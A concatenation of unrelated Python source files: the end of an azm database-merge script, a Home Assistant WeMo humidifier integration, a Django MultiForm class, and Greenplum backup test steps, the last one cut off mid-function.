try:
os.rename(azm_fp+"_output.txt", target_fp+"_output.txt")
except:
pass
except Exception as x:
print("WARNING: move_failed_import_azm_files_to_folder failed")
pass
print("re-raise exception e - ",exstr)
raise e
finally:
print("cleanup start...")
if (use_popen_mode):
# clean-up dump process
try:
dump_process.kill()
dump_process.terminate()
except:
pass
else:
try:
sql_dump_file.close()
except:
pass
try:
g_close_function(args)
except:
pass
if debug_helpers.debug == 1 or args['keep_temp_dir']:
print("debug mode keep_tmp_dir:", dir_processing_azm)
pass # keep files for analysis of exceptions in debug mode
else:
print("cleanup_tmp_dir...")
cleanup_tmp_dir(dir_processing_azm)
return ret
def sigterm_handler(_signo, _stack_frame):
print("azm_db_merge.py: received SIGTERM - exit(0) now...")
sys.exit(0)
return
def get_sql_result(sqlstr, args):
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("get_sql_result cmd:", cmd)
outstr = subprocess.check_output(cmd).decode()
result = outstr.strip()
return result
pidfilename_prefix = "pls_clean_folder_if_no_pid_"
pidfilename_suffix = ".txt"
pidfile_glob_pattern = "/tmpfs/*/{}*{}".format(pidfilename_prefix, pidfilename_suffix)
def gen_pidfile_in_tmp_dir(d):
try:
pid = os.getpid()
pid_file_fp = os.path.join(d, "{}{}{}".format(pidfilename_prefix, pid, pidfilename_suffix))
print("gen_pidfile_in_tmp_dir:", pid_file_fp)
with open(pid_file_fp, "w") as f:
f.write(d)
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print("WARNING: gen_pidfile_in_tmp_dir exception: {}".format(exstr))
def cleanup_old_tmpfs_tmp_dirs_with_invalid_pid_files():
pid = os.getpid()
# cleanup older died pid files
pidfiles = glob.glob(pidfile_glob_pattern)
this_container_pids = psutil.pids()
for pidfile_fp in pidfiles:
try:
pidfile_pid_str = os.path.basename(pidfile_fp).split(pidfilename_prefix)[1].split(pidfilename_suffix)[0]
pidfile_pid = int(pidfile_pid_str)
if pidfile_pid != pid:
if pidfile_pid not in this_container_pids:
print("pidfile_pid not in this_container_pids: {} {}".format(pidfile_pid, this_container_pids))
with open(pidfile_fp, "r") as f:
tmp_dir = f.read().strip()
if os.path.isdir(tmp_dir):
print("cleaning up dead pidfile tmp_dir:", tmp_dir)
shutil.rmtree(tmp_dir)
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print("WARNING: check pidfile_fp {} exception: {}".format(pidfile_fp, exstr))
if __name__ == '__main__':
#################### Program START
print(infostr)
signal.signal(signal.SIGTERM, sigterm_handler)
args = parse_cmd_args()
args["table_operation_stats"] = {
"table": [],
"operation": [],
"duration": []
}
# must be localhost only because now we're using BULK INSERT (or COPY) commands
if args['docker_postgres_server_name'] is not None:
args['pg_host'] = args['docker_postgres_server_name']
if (args['unmerge']):
print("starting with --unmerge mode")
print("checking --sqlite3_executable: ",args['sqlite3_executable'])
try:
cmd = [
args['sqlite3_executable'],
"--version"
]
ret = call(cmd, shell=False)
if ret == 0:
print("sqlite3_executable working - OK")
else:
raise Exception("Secified (or default) --sqlite3_executable not working - ABORT")
except Exception as e:
estr = str(e)
print("error - sqlite3 check exception estr: ",estr)
if "The system cannot find the file specified" in estr:
print("windows run: can't call specified sqlite3_executable - trying use 'where' to find the default 'sqlite3' executable.")
outstr = subprocess.check_output(
["cmd.exe",
"/c",
"where",
"sqlite3"
]
).decode()
print("where returned: ",outstr.strip())
print("blindly using where return val as sqlite3 path...")
args['sqlite3_executable'] = outstr.strip()
cmd = [
args['sqlite3_executable'],
"--version"
]
ret = call(cmd, shell=False)
if ret == 0:
print("sqlite3_executable working - OK")
else:
raise Exception("Secified (or default) --sqlite3_executable not working - ABORT")
else:
args['sqlite3_executable'] = "./sqlite3"
cmd = [
args['sqlite3_executable'],
"--version"
]
ret = call(cmd, shell=False)
if ret == 0:
print("sqlite3_executable working - OK")
else:
raise Exception("Failed to find sqlite3 - please install sqlite3 and make sure it is in the path first. exception:"+str(e))
omit_tables = "spatial_ref_sys,geometry_columns,log_decode_message,azq_internal_types,"+args['exclude_tables']
omit_tables_array = omit_tables.split(",")
args['omit_tables_array'] = omit_tables_array
only_tables = "logs,"+args['only_tables']
only_tables_array = only_tables.split(",")
args['only_tables_array'] = only_tables_array
if only_tables == "logs,": # logs is default table - nothing added
args['only_tables_on'] = False
else:
args['only_tables_on'] = True
if not args['move_imported_azm_files_to_folder'] is None:
try:
os.mkdir(args['move_imported_azm_files_to_folder'])
except:
pass # ok - folder likely already exists...
if os.path.isdir(args['move_imported_azm_files_to_folder']):
pass
else:
raise Exception("ABORT: Can't create or access folder specified by --move_imported_azm_files_to_folder: "+str(args['move_imported_azm_files_to_folder']))
mod_name = args['target_db_type']
if args['debug']:
print("set_debug 1")
debug_helpers.set_debug(1)
else:
print("set_debug 0")
debug_helpers.set_debug(0)
#if mod_name in ['postgresql','mssql']:
mod_name = 'gen_sql'
mod_name = mod_name + "_handler"
print("### get module: ", mod_name)
importlib.import_module(mod_name)
mod = sys.modules[mod_name]
#print "module dir: "+str(dir(mod))
g_connect_function = getattr(mod, 'connect')
g_check_if_already_merged_function = getattr(mod, 'check_if_already_merged')
g_create_function = getattr(mod, 'create')
g_commit_function = getattr(mod, 'commit')
g_close_function = getattr(mod, 'close')
if "," in args['azm_file']:
print("found comman in args['azm_file'] - split and use whichever is first present in the list")
csv = args['azm_file']
found = False
for fp in csv.split(","):
if os.path.isfile(fp):
args['azm_file'] = fp
print("using valid azm_file file path:", args['azm_file'])
found = True
break
if not found:
raise Exception("Failed to find any valid existing azm file in supplied comma separated --azm_file option:"+str(args['azm_file']))
azm_file_is_folder = os.path.isdir(args['azm_file'])
folder_daemon = not args['daemon_mode_rerun_on_folder_after_seconds'] is None
folder_daemon_wait_seconds = 60
if folder_daemon:
if not azm_file_is_folder:
raise Exception("ABORT: --daemon_mode_rerun_on_folder_after_seconds specified but --azm_file is not a folder.")
folder_daemon_wait_seconds = int(args['daemon_mode_rerun_on_folder_after_seconds'])
print("folder_daemon_wait_seconds: ",folder_daemon_wait_seconds)
if folder_daemon_wait_seconds <= 0:
raise Exception("ABORT: --daemon_mode_rerun_on_folder_after_seconds option must be greater than 0.")
ori_args = args
if args['add_imei_id_to_all_tables']:
# get imei
imei = None
col = "IMEI"
table = "log_info"
where = "where {} != ''".format(col) # not null and not empty
sqlstr = "select {} from {} {} order by seqid desc limit 1;".format(col, table, where)
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("call cmd:", cmd)
imei = subprocess.check_output(cmd).decode().strip()
args['imei'] = imei
while(True):
process_start_time = time.time()
args = ori_args.copy() # args gets modified by each run - especially ['azm_file'] gets changed - so we want to use a copy of the original_args here (otherwise args would get modified and we won't be able to restore to the original for daemon_mon
azm_files = []
# check if supplied 'azm_file' is a folder - then iterate over all azms in that folder
if azm_file_is_folder:
dir = args['azm_file']
print("supplied --azm_file: ",dir," is a directory - get a list of .azm files to process:")
matches = []
# recurse as below instead azm_files = glob.glob(os.path.join(dir,"*.azm"))
# http://stackoverflow.com/questions/2186525/use-a-glob-to-find-files-recursively-in-python
for root, dirnames, filenames in os.walk(dir):
for filename in fnmatch.filter(filenames, '*.azm'):
matches.append(os.path.join(root, filename))
azm_files = matches
else:
azm_files = [args['azm_file']]
nazm = len(azm_files)
print("n_azm_files to process: {}".format(nazm))
print("list of azm files to process: "+str(azm_files))
iazm = 0
ifailed = 0
ret = -1
had_errors = False
for azm in azm_files:
iazm = iazm + 1
args['azm_file'] = azm
print("## START process azm {}/{}: '{}'".format(iazm, nazm, azm))
try:
ret = process_azm_file(args)
if (ret != 0):
raise Exception("ABORT: process_azm_file failed with ret code: "+str(ret))
print("## DONE process azm {}/{}: '{}' retcode {}".format(iazm, nazm, azm, ret))
except Exception as e:
ifailed = ifailed + 1
had_errors = True
type_, value_, traceback_ = sys.exc_info()
exstr = traceback.format_exception(type_, value_, traceback_)
print("## FAILED: process azm {} failed with below exception:\n(start of exception)\n{}\n{}(end of exception)".format(azm,str(e),exstr))
if (args['folder_mode_stop_on_first_failure']):
print("--folder_mode_stop_on_first_failure specified - exit now.")
exit(-9)
if (had_errors == False):
print("SUCCESS - operation completed successfully for all azm files (tatal: %d) - in %.03f seconds." % (iazm, time.time() - process_start_time))
else:
print("COMPLETED WITH ERRORS - operation completed but had encountered errors (tatal: %d, failed: %d) - in %.03f seconds - (use --folder_mode_stop_on_first_failure to stop on first failed azm file)." % (iazm,ifailed, time.time() - process_start_time))
if not folder_daemon:
import pandas as pd
stats_df = pd.DataFrame(args["table_operation_stats"]).sort_values("duration", ascending=False)
print("stats_df.head(20):\n", stats_df.head(20))
print("exit code:",str(ret))
exit(ret)
else:
print("*** folder_daemon mode: wait seconds: ",folder_daemon_wait_seconds)
for i in range(0,folder_daemon_wait_seconds):
print("** folder_daemon mode: waiting ",i,"/",folder_daemon_wait_seconds," seconds")
time.sleep(1)
|
|
"""Support for WeMo humidifier."""
import asyncio
from datetime import timedelta
import logging
import async_timeout
from pywemo import discovery
import requests
import voluptuous as vol
from homeassistant.components.fan import (
SPEED_HIGH,
SPEED_LOW,
SPEED_MEDIUM,
SPEED_OFF,
SUPPORT_SET_SPEED,
FanEntity,
)
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.exceptions import PlatformNotReady
import homeassistant.helpers.config_validation as cv
from . import SUBSCRIPTION_REGISTRY
from .const import DOMAIN, SERVICE_RESET_FILTER_LIFE, SERVICE_SET_HUMIDITY
SCAN_INTERVAL = timedelta(seconds=10)
DATA_KEY = "fan.wemo"
_LOGGER = logging.getLogger(__name__)
ATTR_CURRENT_HUMIDITY = "current_humidity"
ATTR_TARGET_HUMIDITY = "target_humidity"
ATTR_FAN_MODE = "fan_mode"
ATTR_FILTER_LIFE = "filter_life"
ATTR_FILTER_EXPIRED = "filter_expired"
ATTR_WATER_LEVEL = "water_level"
# The WEMO_ constants below come from pywemo itself
WEMO_ON = 1
WEMO_OFF = 0
WEMO_HUMIDITY_45 = 0
WEMO_HUMIDITY_50 = 1
WEMO_HUMIDITY_55 = 2
WEMO_HUMIDITY_60 = 3
WEMO_HUMIDITY_100 = 4
WEMO_FAN_OFF = 0
WEMO_FAN_MINIMUM = 1
WEMO_FAN_LOW = 2 # Not used due to limitations of the base fan implementation
WEMO_FAN_MEDIUM = 3
WEMO_FAN_HIGH = 4 # Not used due to limitations of the base fan implementation
WEMO_FAN_MAXIMUM = 5
WEMO_WATER_EMPTY = 0
WEMO_WATER_LOW = 1
WEMO_WATER_GOOD = 2
SUPPORTED_SPEEDS = [SPEED_OFF, SPEED_LOW, SPEED_MEDIUM, SPEED_HIGH]
SUPPORTED_FEATURES = SUPPORT_SET_SPEED
# Since the base fan object supports a set list of fan speeds,
# we have to reuse some of them when mapping to the 5 WeMo speeds
WEMO_FAN_SPEED_TO_HASS = {
WEMO_FAN_OFF: SPEED_OFF,
WEMO_FAN_MINIMUM: SPEED_LOW,
WEMO_FAN_LOW: SPEED_LOW, # Reusing SPEED_LOW
WEMO_FAN_MEDIUM: SPEED_MEDIUM,
WEMO_FAN_HIGH: SPEED_HIGH, # Reusing SPEED_HIGH
WEMO_FAN_MAXIMUM: SPEED_HIGH,
}
# Because we reused mappings in the previous dict, we have to filter them
# back out in this dict, or else we would have duplicate keys
HASS_FAN_SPEED_TO_WEMO = {
v: k
for (k, v) in WEMO_FAN_SPEED_TO_HASS.items()
if k not in [WEMO_FAN_LOW, WEMO_FAN_HIGH]
}
SET_HUMIDITY_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_TARGET_HUMIDITY): vol.All(
vol.Coerce(float), vol.Range(min=0, max=100)
),
}
)
RESET_FILTER_LIFE_SCHEMA = vol.Schema({vol.Required(ATTR_ENTITY_ID): cv.entity_ids})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up discovered WeMo humidifiers."""
if DATA_KEY not in hass.data:
hass.data[DATA_KEY] = {}
if discovery_info is None:
return
location = discovery_info["ssdp_description"]
mac = discovery_info["mac_address"]
try:
device = WemoHumidifier(discovery.device_from_description(location, mac))
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:
_LOGGER.error("Unable to access %s (%s)", location, err)
raise PlatformNotReady
hass.data[DATA_KEY][device.entity_id] = device
add_entities([device])
def service_handle(service):
"""Handle the WeMo humidifier services."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
humidifiers = [
device
for device in hass.data[DATA_KEY].values()
if device.entity_id in entity_ids
]
if service.service == SERVICE_SET_HUMIDITY:
target_humidity = service.data.get(ATTR_TARGET_HUMIDITY)
for humidifier in humidifiers:
humidifier.set_humidity(target_humidity)
elif service.service == SERVICE_RESET_FILTER_LIFE:
for humidifier in humidifiers:
humidifier.reset_filter_life()
# Register service(s)
hass.services.register(
DOMAIN, SERVICE_SET_HUMIDITY, service_handle, schema=SET_HUMIDITY_SCHEMA
)
hass.services.register(
DOMAIN,
SERVICE_RESET_FILTER_LIFE,
service_handle,
schema=RESET_FILTER_LIFE_SCHEMA,
)
class WemoHumidifier(FanEntity):
"""Representation of a WeMo humidifier."""
def __init__(self, device):
"""Initialize the WeMo switch."""
self.wemo = device
self._state = None
self._available = True
self._update_lock = None
self._fan_mode = None
self._target_humidity = None
self._current_humidity = None
self._water_level = None
self._filter_life = None
self._filter_expired = None
self._last_fan_on_mode = WEMO_FAN_MEDIUM
self._model_name = self.wemo.model_name
self._name = self.wemo.name
self._serialnumber = self.wemo.serialnumber
def _subscription_callback(self, _device, _type, _params):
"""Update the state by the Wemo device."""
_LOGGER.info("Subscription update for %s", self.name)
updated = self.wemo.subscription_update(_type, _params)
self.hass.add_job(self._async_locked_subscription_callback(not updated))
async def _async_locked_subscription_callback(self, force_update):
"""Handle an update from a subscription."""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
await self._async_locked_update(force_update)
self.async_schedule_update_ha_state()
@property
def unique_id(self):
"""Return the ID of this WeMo humidifier."""
return self._serialnumber
@property
def name(self):
"""Return the name of the humidifier if any."""
return self._name
@property
def is_on(self):
"""Return true if switch is on. Standby is on."""
return self._state
@property
def available(self):
"""Return true if switch is available."""
return self._available
@property
def icon(self):
"""Return the icon of device based on its type."""
return "mdi:water-percent"
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_CURRENT_HUMIDITY: self._current_humidity,
ATTR_TARGET_HUMIDITY: self._target_humidity,
ATTR_FAN_MODE: self._fan_mode,
ATTR_WATER_LEVEL: self._water_level,
ATTR_FILTER_LIFE: self._filter_life,
ATTR_FILTER_EXPIRED: self._filter_expired,
}
@property
def speed(self) -> str:
"""Return the current speed."""
return WEMO_FAN_SPEED_TO_HASS.get(self._fan_mode)
@property
def speed_list(self) -> list:
"""Get the list of available speeds."""
return SUPPORTED_SPEEDS
@property
def supported_features(self) -> int:
"""Flag supported features."""
return SUPPORTED_FEATURES
async def async_added_to_hass(self):
"""Wemo humidifier added to HASS."""
# Define inside async context so we know our event loop
self._update_lock = asyncio.Lock()
registry = SUBSCRIPTION_REGISTRY
await self.hass.async_add_executor_job(registry.register, self.wemo)
registry.on(self.wemo, None, self._subscription_callback)
async def async_update(self):
"""Update WeMo state.
Wemo has an aggressive retry logic that sometimes can take over a
minute to return. If we don't get a state after 5 seconds, assume the
Wemo humidifier is unreachable. If update goes through, it will be made
available again.
"""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
try:
with async_timeout.timeout(5):
await asyncio.shield(self._async_locked_update(True))
except asyncio.TimeoutError:
_LOGGER.warning("Lost connection to %s", self.name)
self._available = False
async def _async_locked_update(self, force_update):
"""Try updating within an async lock."""
async with self._update_lock:
await self.hass.async_add_executor_job(self._update, force_update)
def _update(self, force_update=True):
"""Update the device state."""
try:
self._state = self.wemo.get_state(force_update)
self._fan_mode = self.wemo.fan_mode_string
self._target_humidity = self.wemo.desired_humidity_percent
self._current_humidity = self.wemo.current_humidity_percent
self._water_level = self.wemo.water_level_string
self._filter_life = self.wemo.filter_life_percent
self._filter_expired = self.wemo.filter_expired
if self.wemo.fan_mode != WEMO_FAN_OFF:
self._last_fan_on_mode = self.wemo.fan_mode
if not self._available:
_LOGGER.info("Reconnected to %s", self.name)
self._available = True
except AttributeError as err:
_LOGGER.warning("Could not update status for %s (%s)", self.name, err)
self._available = False
def turn_on(self, speed: str = None, **kwargs) -> None:
"""Turn the switch on."""
if speed is None:
self.wemo.set_state(self._last_fan_on_mode)
else:
self.set_speed(speed)
def turn_off(self, **kwargs) -> None:
"""Turn the switch off."""
self.wemo.set_state(WEMO_FAN_OFF)
def set_speed(self, speed: str) -> None:
"""Set the fan_mode of the Humidifier."""
self.wemo.set_state(HASS_FAN_SPEED_TO_WEMO.get(speed))
def set_humidity(self, humidity: float) -> None:
"""Set the target humidity level for the Humidifier."""
if humidity < 50:
self.wemo.set_humidity(WEMO_HUMIDITY_45)
elif 50 <= humidity < 55:
self.wemo.set_humidity(WEMO_HUMIDITY_50)
elif 55 <= humidity < 60:
self.wemo.set_humidity(WEMO_HUMIDITY_55)
elif 60 <= humidity < 100:
self.wemo.set_humidity(WEMO_HUMIDITY_60)
elif humidity >= 100:
self.wemo.set_humidity(WEMO_HUMIDITY_100)
def reset_filter_life(self) -> None:
"""Reset the filter life to 100%."""
self.wemo.reset_filter_life()
|
|
from __future__ import unicode_literals
from collections import defaultdict, OrderedDict
from itertools import chain
from functools import reduce
import operator
from django.core.exceptions import ImproperlyConfigured
from django.forms.forms import BaseForm
from django.forms.utils import ErrorList
from django.forms.widgets import Media
from django.utils.safestring import mark_safe
class InvalidArgument:
pass
class MultiForm(BaseForm):
"""
A BaseForm subclass that can wrap several sub-forms into one entity.
To use it, define a `base_forms` attribute which should be a mapping
(dict or collections.OrderedDict for example).
It can then be used like a regular form.
"""
base_fields = None # Needed to bypass the absence of fancy metaclass
_baseform_signature = OrderedDict([ # TODO: signature objects (pep 362)
('data', None),
('files', None),
('auto_id', 'id_%s'),
('prefix', None),
('initial', None),
('error_class', ErrorList),
('label_suffix', ':'),
('empty_permitted', False),
])
def __init__(self, *args, **kwargs):
sig_kwargs, extra_kwargs = self._normalize_init_signature(args, kwargs)
self._init_parent(**sig_kwargs)
self._init_wrapped_forms(sig_kwargs, extra_kwargs)
def _init_parent(self, **kwargs):
super(MultiForm, self).__init__(**kwargs)
def _normalize_init_signature(self, args, kwargs):
"""
Put all the given arguments to __init__ into a dict, whether they were
passed as positional arguments or keyword ones.
Return two dictionaries: the normalized init arguments and another one
with the extra ones (not part of the signature).
"""
if len(args) > len(self._baseform_signature):
msg = "%s.__init__ got too many positional arguments."
raise TypeError(msg % self.__class__)
normalized_kwargs = self._baseform_signature.copy()
for k, v in zip(self._baseform_signature, args):
if k in kwargs:
msg = "%s.__init__ got multiple values for argument '%s'"
raise TypeError(msg % (self.__class__, k))
normalized_kwargs[k] = v
for k in list(self._baseform_signature)[len(args):]: # remaining ones
try:
normalized_kwargs[k] = kwargs.pop(k)
except KeyError:
pass
# at this point, ``kwargs`` only contain keys that are not
# in the form's signature
return normalized_kwargs, kwargs
def _init_wrapped_forms(self, sig_kwargs, extra_kwargs):
"""
Initialize the wrapped forms by passing the ones received in __init__
and adding the keyword arguments whose names look like `$name__*`.
"""
base_forms = self.get_base_forms()
# We start by extracting all the keyword parameters that look like
# "$name__*" where $name is the name of one of the wrapped form.
# With this, we build a mapping of (name -> stripped_kwargs)
# where the stripped_kwargs have been stripped off of the form's name.
dispatched_kwargs = defaultdict(dict)
for k in list(extra_kwargs): # Because we mutate it
prefix, _, remainder = k.partition('__')
if remainder and prefix in base_forms:
dispatched_kwargs[prefix][remainder] = extra_kwargs.pop(k)
# Any extra_kwargs left at this point will be passed as-is to all
# wrapped forms.
self.forms = OrderedDict()
for name, form_class in base_forms.items():
# We build each wrapped form one by one.
# Their keyword arguments are built in three steps, each with
# precedence over the next one:
# 1) For all the keywords that are part of the normal signature,
# we check for the presence of a dispatch_init_$keyword method
# on the instance.
# If no such method is present, we just pass the value of the
# argument as-is.
# If such a method exists, then we use the result of calling
# this method, passing the form's name and the original value.
# 2) For any existing ``extra_kwargs`` we check for the presence
# of a dispatch_init_$keyword method on the instance.
# If no such method is present, we just pass the value of the
# argument as-is.
# If such a method exists, then we use the result of calling
# this method, passing the form's name and the original value.
# 3) If some dispatched_kwargs exist for this method (that is,
# keyword arguments passed to the MultiForm's __init__ whose
# name look like "$name__*"), then they are applied.
kwargs = {}
for k, v in chain(sig_kwargs.items(), extra_kwargs.items()):
if hasattr(self, 'dispatch_init_%s' % k):
v = getattr(self, 'dispatch_init_%s' % k)(name, v)
if v is InvalidArgument:
continue
kwargs[k] = v
kwargs.update(dispatched_kwargs[name])
self.forms[name] = form_class(**kwargs)
def dispatch_init_prefix(self, name, prefix):
"""
When instanciating a wrapped form, we add its name to the given prefix.
"""
# prefix is already stored on self.prefix by super().__init__,
# so self.add_prefix works.
return self.add_prefix(name)
def get_base_forms(self):
"""
Return a mapping of the forms that this multiform wraps (name -> form).
"""
if not getattr(self, 'base_forms', None):
error_message_fmt = "%s does not define a base_forms attribute."
raise ImproperlyConfigured(error_message_fmt % self.__class__)
# Incidentally, this also makes a shallow copy
return OrderedDict(self.base_forms)
def _combine(self, attr, filter=False,
call=False, call_args=(), call_kwargs=None,
ignore_missing=False):
"""
Combine an attribute (or method) of each wrapped form into an
OrderedDict.
To remove empty vales from the dict, pass ``filer=False``.
To call a method, pass ``call=True`` (passing ``call_args`` and
``call_kwargs`` if needed).
"""
if not call_kwargs:
call_kwargs = {}
d = OrderedDict()
for name, form in self.forms.items():
if ignore_missing and not hasattr(form, attr):
if not filter:
d[name] = None
continue
v = getattr(form, attr)
if call:
v = v(*call_args, **call_kwargs)
if not filter or v:
d[name] = v
return d
def _combine_values(self, *args, **kwargs):
"""
Similar to _combine, but only return the values, not the full dict.
"""
return self._combine(*args, **kwargs).values()
def _combine_chain(self, *args, **kwargs):
"""Use itertools.chain on the combined values."""
return chain.from_iterable(self._combine_values(*args, **kwargs))
# All BaseForm's public methods and properties are implemented next.
# Basically, a call to a MultiForm's method gets dispatched to all the
# wrapped forms and the results get collected either in an OrderedDict
# or in a list.
def __iter__(self):
return chain.from_iterable(self._combine_values('__iter__', call=True))
def __getitem__(self, name):
return self.forms[name]
def _html_output(self, *args, **kwargs):
rendered = self._combine_values('_html_output', call=True, filter=True,
call_args=args, call_kwargs=kwargs)
return mark_safe('\n'.join(rendered))
def non_field_errors(self):
return self._combine('non_field_errors', call=True, filter=True)
def full_clean(self):
# This will call full_clean on all sub-forms
# (and populate their _errors attribute):
self._errors = self._combine('errors', filter=True)
if not self._errors:
# Each sub-form's cleaned_data is now populated
self.cleaned_data = self._combine('cleaned_data')
@property
def changed_data(self):
return self._combine('changed_data', filter=True)
@property
def media(self):
return reduce(operator.add, self._combine_values('media'), Media())
def is_multipart(self):
return any(self._combine_values('is_multipart', call=True))
def hidden_fields(self):
return list(self._combine_chain('hidden_fields', call=True))
def visible_fields(self):
return list(self._combine_chain('visible_fields', call=True))
class MultiModelForm(MultiForm):
"""
A MultiForm that supports a ModelForm's signature.
Also implements a save method.
"""
_baseform_signature = OrderedDict(
list(MultiForm._baseform_signature.items()) + [('instance', None)])
def _init_parent(self, **kwargs):
del kwargs['instance']
super(MultiForm, self).__init__(**kwargs)
def dispatch_init_instance(self, name, instance):
if instance is None:
return None
return getattr(instance, name)
def save(self, commit=True):
# TODO: Find a good API to wrap this in a db transaction
# TODO: allow committing some forms but not others
instances = self._combine('save', call=True,
call_kwargs={'commit': commit})
if commit:
self.save_m2m()
return instances
def save_m2m(self):
# TODO: Find a good API to wrap this in a db transaction
return self._combine('save_m2m', filter=True, call=True,
ignore_missing=True)
|
|
# coding: utf-8
import os
import socket
import gzip
from gppylib.commands.base import Command, REMOTE, WorkerPool, CommandResult
from gppylib.db import dbconn
from test.behave_utils.utils import getRows, validate_parse_email_file
from gppylib.gparray import GpArray
from gppylib.operations.unix import CheckFile
from test.behave_utils.utils import backup_data_to_file, check_table_exists, validate_restore_data_in_file
master_data_dir = os.environ.get('MASTER_DATA_DIRECTORY')
comment_start_expr = '-- '
comment_expr = '-- Name: '
comment_data_expr_a = '-- Data: '
comment_data_expr_b = '-- Data for Name: '
len_start_comment_expr = len(comment_start_expr)
@given('the user locks "{table_name}" in "{lock_mode}" using connection "{conn}" on "{dbname}"')
@when('the user locks "{table_name}" in "{lock_mode}" using connection "{conn}" on "{dbname}"')
@then('the user locks "{table_name}" in "{lock_mode}" using connection "{conn}" on "{dbname}"')
def impl(context, table_name, lock_mode, conn, dbname):
query = "begin; lock table %s in %s" % (table_name, lock_mode)
conn = dbconn.connect(dbconn.DbURL(dbname=dbname)) # todo not truthful about using conn parameter
dbconn.execSQL(conn, query)
context.conn = conn
@when('the user runs the query "{query}" in database "{dbname}" in a worker pool "{poolname}" as soon as pg_class is locked')
@then('the user runs the query "{query}" in database "{dbname}" in a worker pool "{poolname}" as soon as pg_class is locked')
def impl(context, query, dbname, poolname):
pool = WorkerPool(numWorkers=1)
cmd = on_unlock(query,dbname)
pool.addCommand(cmd)
if not hasattr(context, 'pool'):
context.pool = {}
context.pool[poolname] = pool
context.cmd = cmd
@when('the user runs the "{cmd}" in a worker pool "{poolname}"')
@then('the user runs the "{cmd}" in a worker pool "{poolname}"')
def impl(context, cmd, poolname):
command = Command(name='run gpcrondump in a separate thread', cmdStr=cmd)
pool = WorkerPool(numWorkers=1)
pool.addCommand(command)
if not hasattr(context, 'pool'):
context.pool = {}
context.pool[poolname] = pool
context.cmd = cmd
class on_unlock(Command):
def __init__(self, query, dbname):
self.dbname = dbname
self.query = query
self.result = 1
self.completed = False
self.halt = False
Command.__init__(self, 'on unlock', 'on unlock', ctxt=None, remoteHost=None)
def get_results(self):
return CommandResult(self.result, '', '', self.completed, self.halt)
def run(self):
while check_pg_class_lock(self.dbname) != 1:
pass
with dbconn.connect(dbconn.DbURL(dbname=self.dbname)) as conn:
dbconn.execSQL(conn, self.query)
self.result = 0
self.completed = True
self.halt = False
def check_pg_class_lock(dbname):
seg_count = 1
query = """select count(*)
from pg_locks
where relation in (select oid from pg_class where relname='pg_class')
and locktype='relation' and mode='ExclusiveLock'"""
row_count = getRows(dbname, query)[0][0]
return row_count
@given('the "{backup_pg}" has a lock on the pg_class table in "{dbname}"')
@when('the "{backup_pg}" has a lock on the pg_class table in "{dbname}"')
@then('the "{backup_pg}" has a lock on the pg_class table in "{dbname}"')
def impl(context, dbname, backup_pg):
seg_count = 1
timeout = 2
while timeout > 0:
row_count = check_pg_class_lock(dbname)
time.sleep(1)
timeout -= 1
if row_count != seg_count:
raise Exception("Incorrect (number of) lock/locks on pg_class, expected count = %s, received count = %s" % (seg_count, row_count))
@then('the worker pool "{poolname}" is cleaned up')
@when('the worker pool "{poolname}" is cleaned up')
def impl(context, poolname):
pool = context.pool[poolname]
if pool:
pool.join()
for c in pool.getCompletedItems():
result = c.get_results()
context.ret_code = result.rc
context.stdout_message = result.stdout
context.error_message = result.stderr
pool.haltWork()
pool.joinWorkers()
else:
raise Exception('Worker pool is None.Probably behave step to initialize the worker pool is missing.')
@given('the user drops "{tablename}" in "{dbname}" in a worker pool "{poolname}"')
@then('the user drops "{tablename}" in "{dbname}" in a worker pool "{poolname}"')
@when('the user drops "{tablename}" in "{dbname}" in a worker pool "{poolname}"')
def impl(context, tablename, dbname, poolname):
pool = WorkerPool(numWorkers=1)
cmd = Command(name='drop a table in a worker pool', cmdStr="""psql -c "DROP TABLE %s" -d %s""" % (tablename, dbname))
pool.addCommand(cmd)
if not hasattr(context, 'pool'):
context.pool = {}
context.pool[poolname] = pool
@given('the user closes the connection "{conn_name}"')
@when('the user closes the connection "{conn_name}"')
@then('the user closes the connection "{conn_name}"')
def impl(context, conn_name):
query = """ROLLBACK;"""
dbconn.execSQL(context.conn, query)
context.conn.close()
@given('verify that "{backup_pg}" has no lock on the pg_class table in "{dbname}"')
@when('verify that "{backup_pg}" has no lock on the pg_class table in "{dbname}"')
@then('verify that "{backup_pg}" has no lock on the pg_class table in "{dbname}"')
def impl(context, backup_pg, dbname):
query = """select count(*)
from pg_locks
where relation in (select oid from pg_class where relname='pg_class')
and locktype='relation' and mode='ExclusiveLock'"""
row_count = getRows(dbname, query)[0][0]
if row_count != 0:
raise Exception("Found a ExclusiveLock on pg_class")
@given('there is a "{tabletype}" table "{table_name}" with compression "{compression_type}" in "{dbname}" with data and {rowcount} rows')
@when('there is a "{tabletype}" table "{table_name}" with compression "{compression_type}" in "{dbname}" with data and {rowcount} rows')
@then('there is a "{tabletype}" table "{table_name}" with compression "{compression_type}" in "{dbname}" with data and {rowcount} rows')
def impl(context, tabletype, table_name, compression_type, dbname, rowcount):
populate_regular_table_data(context, tabletype, table_name, compression_type, dbname, int(rowcount))
@given('verify the metadata dump file syntax under "{directory}" for comments and types')
@when('verify the metadata dump file syntax under "{directory}" for comments and types')
@then('verify the metadata dump file syntax under "{directory}" for comments and types')
def impl(context, directory):
names = ["Name", "Data", "Data for Name"]
types = ["TABLE", "TABLE DATA", "EXTERNAL TABLE", "ACL", "CONSTRAINT", "COMMENT", "PROCEDURAL LANGUAGE", "SCHEMA", "AOSTORAGEOPTS"]
master_dump_dir = directory if len(directory.strip()) != 0 else master_data_dir
metadata_path = __get_dump_metadata_path(context, master_dump_dir)
# gzip in python 2.6 does not support __exit__, so it cannot be used in "with"
# with gzip.open(metadata_path, 'r') as fd:
fd = None
try:
fd = gzip.open(metadata_path, 'r')
line = None
for line in fd:
if (line[:3] == comment_start_expr):
